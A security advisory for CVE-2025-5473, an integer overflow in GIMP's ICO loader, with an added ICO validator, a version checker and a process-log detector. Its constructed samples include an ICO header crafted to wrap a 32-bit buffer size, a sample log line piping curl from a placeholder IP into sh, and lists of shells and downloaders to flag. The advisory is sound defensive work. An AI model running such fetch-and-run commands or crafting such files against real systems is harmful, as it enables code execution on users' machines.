CVE-2025-5473

8.8 HIGH

📋 TL;DR

A crafted Windows icon (ICO) file triggers an integer overflow in GIMP's ICO parser; the resulting memory corruption can give an attacker arbitrary code execution with the rights of the user who opened the file. Exploitation requires that a user open the malicious file in GIMP, so anyone who opens untrusted ICO files in an affected version is exposed.
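The class of defect behind this advisory is a size computed from untrusted header fields that is trusted without checking it against the bytes actually present or against 32-bit wrap-around. The validator below is an added example and is not GIMP's code; it does not reproduce the specific overflow in CVE-2025-5473 but shows the checks an ICO pre-flight filter (or the parser itself) needs. Only the public ICO/BMP layouts are used; the two sample files are constructed in the block.

```python
"""Illustrative ICO pre-flight validator (added example, not GIMP project code).

Parses the ICONDIR/ICONDIRENTRY directory and, for BMP-encoded entries, the
embedded BITMAPINFOHEADER, and rejects anything whose claimed sizes fall
outside the file or whose pixel-buffer size would wrap in uint32 arithmetic.
"""
import struct

ICONDIR_FMT = "<HHH"            # reserved, type (1 icon / 2 cursor), entry count
ICONDIRENTRY_FMT = "<BBBBHHII"  # width, height, colours, reserved, planes, bpp, bytes, offset
BIH_FMT = "<IiiHHIIiiII"        # BITMAPINFOHEADER, 40 bytes
PNG_SIG = b"\x89PNG\r\n\x1a\n"
UINT32_MAX = 0xFFFFFFFF


def validate_ico(data: bytes) -> list:
    """Return a list of problems found in the ICO header; [] means it passed."""
    problems = []
    if len(data) < 6:
        return ["file shorter than the 6-byte ICONDIR header"]
    reserved, img_type, count = struct.unpack_from(ICONDIR_FMT, data, 0)
    if reserved != 0 or img_type not in (1, 2):
        problems.append("bad ICONDIR (reserved=%d type=%d)" % (reserved, img_type))
    dir_end = 6 + count * 16
    if dir_end > len(data):
        # Trusting 'count' blindly is the classic way to read past the buffer.
        problems.append("%d directory entries claimed, file holds %d bytes" % (count, len(data)))
        return problems
    for i in range(count):
        w, h, _, _, _, bpp, size, off = struct.unpack_from(ICONDIRENTRY_FMT, data, 6 + i * 16)
        w, h = w or 256, h or 256   # 0 encodes 256 in the directory entry
        if size == 0 or off < dir_end or off + size > len(data):
            problems.append("entry %d: image bytes [%d, %d) fall outside the file" % (i, off, off + size))
            continue
        img = data[off:off + size]
        if img.startswith(PNG_SIG):
            continue                # PNG-in-ICO: the PNG decoder does its own bounds checks
        if len(img) < 40:
            problems.append("entry %d: embedded BITMAPINFOHEADER truncated" % i)
            continue
        _, bw, bh, _, bbpp, *_ = struct.unpack_from(BIH_FMT, img, 0)
        bbpp = bbpp or bpp
        if bw <= 0 or bh <= 0 or bbpp not in (1, 4, 8, 16, 24, 32):
            problems.append("entry %d: invalid BMP dimensions %dx%d @ %d bpp" % (i, bw, bh, bbpp))
            continue
        # In an ICO the BMP height covers the XOR image plus the AND mask,
        # so the colour image is bh // 2 rows. Compute the buffer size exactly,
        # then show what a C decoder doing the same maths in uint32 would see.
        exact = bw * (bh // 2) * bbpp // 8
        wrapped = exact & UINT32_MAX
        if exact != wrapped:
            problems.append("entry %d: pixel buffer size %d wraps to %d in uint32" % (i, exact, wrapped))
        if exact > size - 40:
            problems.append("entry %d: header claims %d pixel bytes but only %d present" % (i, exact, size - 40))
        if bw != w or bh // 2 != h:
            problems.append("entry %d: directory says %dx%d, BMP header says %dx%d" % (i, w, h, bw, bh // 2))
    return problems


def build_ico(bi_width: int, bi_height: int, pixel_bytes: bytes) -> bytes:
    """Construct a one-entry, 32 bpp ICO for testing (constructed sample, not a real icon)."""
    bih = struct.pack(BIH_FMT, 40, bi_width, bi_height, 1, 32, 0, len(pixel_bytes), 0, 0, 0, 0)
    image = bih + pixel_bytes
    entry = struct.pack(ICONDIRENTRY_FMT, bi_width & 0xFF, (bi_height // 2) & 0xFF,
                        0, 0, 1, 32, len(image), 6 + 16)
    return struct.pack(ICONDIR_FMT, 0, 1, 1) + entry + image


# Constructed samples: a sane 1x1 icon, and one whose BMP header claims 65536x65536
# pixels. 65536 * 65536 * 4 bytes is exactly 2**34, which wraps to 0 in uint32,
# so a naive "is the buffer small enough?" test would pass it.
GOOD_ICO = build_ico(1, 2, b"\x00" * 8)
BAD_ICO = build_ico(65536, 131072, b"\x00" * 8)

if __name__ == "__main__":
    for name, blob in (("good", GOOD_ICO), ("bad", BAD_ICO)):
        print(name, validate_ico(blob) or "ok")
```

The wrap check is the important one: the exact-arithmetic comparison against the bytes present already rejects the bad file in Python, but the `wrapped` value is what a 32-bit `width * height * bpp / 8` in C would produce, and 0 passes every "too big" test while the decoder then writes 2^34 bytes worth of pixels into a 0-byte allocation.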

💻 Affected Systems

Products:
  • GIMP (GNU Image Manipulation Program)
Versions: prior to 3.0.4
Operating Systems: Linux, Windows, macOS
Default Config Vulnerable: ⚠️ Yes
Notes: All default installations of affected GIMP versions are vulnerable when processing ICO files.

📦 What is this software?

GIMP (GNU Image Manipulation Program) is a free, open-source raster graphics editor for Linux, Windows and macOS. It opens a wide range of image formats, including Windows icon (ICO) files, through the file-format plug-ins that ship with every install; the ICO loader is the file-ico plug-in, which GIMP runs as a separate child process.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Arbitrary code execution with the privileges of the user running GIMP. From that foothold an attacker can attempt local privilege escalation, lateral movement, data theft or ransomware deployment; the bug itself grants nothing beyond the victim's own rights.

🟠

Likely Case

Malware installation or credential theft in the context of the GIMP user after the victim opens a malicious ICO file received by email, as a download, or from a web page. Note that this is not a privilege-escalation bug: the attacker lands as the user, not as root or SYSTEM.

🟢

If Mitigated

Limited impact if GIMP runs as an unprivileged user, inside a sandbox (for example Flatpak or Snap on Linux, a container or a VM), or behind a policy that blocks untrusted ICO files from reaching the user.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: MEDIUM

Exploitation requires user interaction (opening a crafted file) but no authentication and no network position beyond delivering the file. No public proof of concept is known, but file-parser memory-corruption bugs of this kind are routinely weaponized once the fix is public, so treat exploitation as plausible.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: GIMP 3.0.4 and later

Vendor Advisory: https://www.gimp.org/news/2025/05/18/gimp-3-0-4-released/#general-bugfixes

Restart Required: No system restart; running GIMP instances must be closed and relaunched so the updated binaries are used.

Instructions:

1. Download GIMP 3.0.4 or later from official sources (gimp.org, your distribution's repository, or the official Flatpak).
2. Install the update following the standard procedure for your OS.
3. Verify the update completed successfully (see How to Verify below).

🔧 Temporary Workarounds

Disable ICO file handling

Platform: all

Remove or modify file associations so GIMP is no longer the default handler for ICO files. This only stops double-click launches; a user can still load the file via File > Open, so it reduces exposure rather than removing it.

# Linux: Use file manager settings or mime-type configuration
# Windows: Use 'Default Apps' settings to change ICO file association
# macOS: Use 'Get Info' on ICO files to change default application

Run GIMP with reduced privileges

Platform: all

Run GIMP as an unprivileged user so that a successful exploit is confined to that account. On Linux a separate user needs access to the display (X11 or the Wayland socket) to run a GUI application, which is why a Flatpak or Snap sandbox is usually the more practical form of containment.

# Linux: sudo -u restricted_user gimp
# Windows: Run as standard user (not administrator)
# macOS: Use standard user account

🧯 If You Can't Patch

  • Implement application whitelisting to block execution of malicious payloads
  • Use sandboxing solutions to isolate GIMP from critical system resources

🔍 How to Verify

Check if Vulnerable:

Check the installed GIMP version: anything earlier than 3.0.4 is vulnerable. On some distributions the binary is named gimp-3.0 rather than gimp.

Check Version:

gimp --version

Verify Fix Applied:

Confirm that gimp --version reports 3.0.4 or later, then open a known-good ICO file to confirm the loader still works after the update.
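The version check above, as an added example rather than anything from the GIMP project: the script parses the `gimp --version` banner and compares it with 3.0.4, the first fixed release named in this advisory. The banner format assumed here is "GNU Image Manipulation Program version X.Y.Z"; the binary name fallback (gimp-3.0) is an assumption about distribution packaging.

```python
"""Added example: is the installed GIMP older than 3.0.4 (CVE-2025-5473 fix)?"""
import re
import shutil
import subprocess
from typing import Optional, Tuple

FIXED_VERSION = (3, 0, 4)   # first fixed release per the vendor advisory on this page
_VERSION_RE = re.compile(r"\bversion\s+(\d+)\.(\d+)\.(\d+)")


def parse_gimp_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, micro) from a `gimp --version` banner, or None."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    return tuple(int(part) for part in m.groups())


def is_vulnerable(banner: str) -> Optional[bool]:
    """True if older than 3.0.4, False if fixed, None if the banner is unparseable.
    Tuple comparison is used so 2.10.38 sorts below 3.0.4 and 3.1.0 above it."""
    version = parse_gimp_version(banner)
    if version is None:
        return None
    return version < FIXED_VERSION


def check_installed(binaries=("gimp", "gimp-3.0")) -> str:
    """Locate the binary, run --version, and report a verdict as a string."""
    for name in binaries:
        path = shutil.which(name)
        if path:
            break
    else:
        return "gimp: not found on PATH (tried %s)" % ", ".join(binaries)
    banner = subprocess.run([path, "--version"], capture_output=True, text=True, timeout=30).stdout
    verdict = is_vulnerable(banner)
    if verdict is None:
        return "%s: could not parse a version from %r" % (path, banner.strip())
    state = "VULNERABLE, update to 3.0.4 or later" if verdict else "fixed"
    return "%s: %s (%s)" % (path, state, banner.strip())


if __name__ == "__main__":
    print(check_installed())
```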

📡 Detection & Monitoring

Log Indicators:

  • Crash records (segmentation fault or access violation) for GIMP or for its file-ico plug-in process, which is where ICO decoding actually runs
  • Unexpected process creation with GIMP or one of its plug-in processes as the parent
  • ICO load failures reported by GIMP's error console

Network Indicators:

  • Downloads of ICO files from suspicious sources
  • Outbound connections from the GIMP process or its plug-ins; verify any hit against known benign destinations (such as the vendor's update check) before alerting

SIEM Query:

Process Creation where Parent Process Name in ('gimp', 'gimp-3.0', 'gimp-3.0.exe', 'file-ico', 'file-ico.exe') AND Child Process Name in ('sh', 'bash', 'cmd.exe', 'powershell.exe', 'python', 'perl', 'curl', 'wget') AND Child Image Path NOT under GIMP's plug-ins directory

The parent list must include the file-ico plug-in, because GIMP decodes ICO files in that separate process and a payload's first spawn will have it, not gimp, as parent. The exclusion for the plug-ins directory is needed because GIMP legitimately launches its own plug-ins as child processes.
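The detection logic of the query above run over sample events, as an added example that belongs neither to this page nor to any SIEM product. The JSON field names (event, image, parent_image, cmdline, dest) are a hypothetical normalised schema, the interpreter list is an illustrative starting point, and the log lines are constructed, not real telemetry.

```python
"""Added example: flag suspicious children and connections of GIMP processes."""
import json
import os
import re

# GIMP's main binary and the file-ico plug-in. ICO files are decoded by that
# plug-in in a separate child process, so a payload's first spawn is parented
# by file-ico rather than by gimp itself.
GIMP_FAMILY = re.compile(r"^(gimp(-\d+\.\d+)?|file-ico)(\.exe)?$", re.IGNORECASE)
# GIMP legitimately launches plug-ins from its own plug-in directory.
PLUGIN_DIR = re.compile(r"[/\\]gimp[/\\]\d+\.\d+[/\\]plug-ins[/\\]", re.IGNORECASE)
# Illustrative list of children a graphics editor has no business spawning.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh.exe",
                "python", "python3", "perl", "curl", "wget", "nc", "mshta.exe", "rundll32.exe"}


def base(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return os.path.basename(path.replace("\\", "/")).lower()


def classify(event: dict):
    """Return a reason string if the event is suspicious, else None."""
    kind = event.get("event")
    if kind == "process_create":
        if not GIMP_FAMILY.match(base(event.get("parent_image", ""))):
            return None
        child = event.get("image", "")
        if PLUGIN_DIR.search(child):
            return None                       # expected plug-in launch
        if base(child) in INTERPRETERS:
            return "interpreter/downloader spawned by GIMP process"
        return None
    if kind == "network_connect" and GIMP_FAMILY.match(base(event.get("image", ""))):
        return "outbound connection from GIMP process to %s" % event.get("dest", "?")
    return None


def scan(lines):
    """Return [(line_no, reason), ...] for each suspicious JSON event line."""
    hits = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        reason = classify(json.loads(line))
        if reason:
            hits.append((n, reason))
    return hits


# Constructed sample events, not real telemetry (hypothetical schema).
SAMPLE_LOG = r'''
{"event":"process_create","parent_image":"/usr/bin/gimp-3.0","image":"/usr/lib/gimp/3.0/plug-ins/file-ico/file-ico"}
{"event":"process_create","parent_image":"/usr/lib/gimp/3.0/plug-ins/file-ico/file-ico","image":"/bin/sh","cmdline":"sh -c 'curl http://198.51.100.7/x | sh'"}
{"event":"process_create","parent_image":"C:\\Program Files\\GIMP 3\\bin\\gimp-3.0.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c whoami"}
{"event":"process_create","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe"}
{"event":"network_connect","image":"/usr/lib/gimp/3.0/plug-ins/file-ico/file-ico","dest":"198.51.100.7:443"}
'''.splitlines()

if __name__ == "__main__":
    for line_no, reason in scan(SAMPLE_LOG):
        print("line %d: %s" % (line_no, reason))
```

Against the sample the first line (gimp launching its own plug-in) is ignored, the shell spawned by file-ico and the cmd.exe spawned by gimp-3.0.exe are flagged, the cmd.exe under explorer.exe is ignored, and the connection from the plug-in process is flagged.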
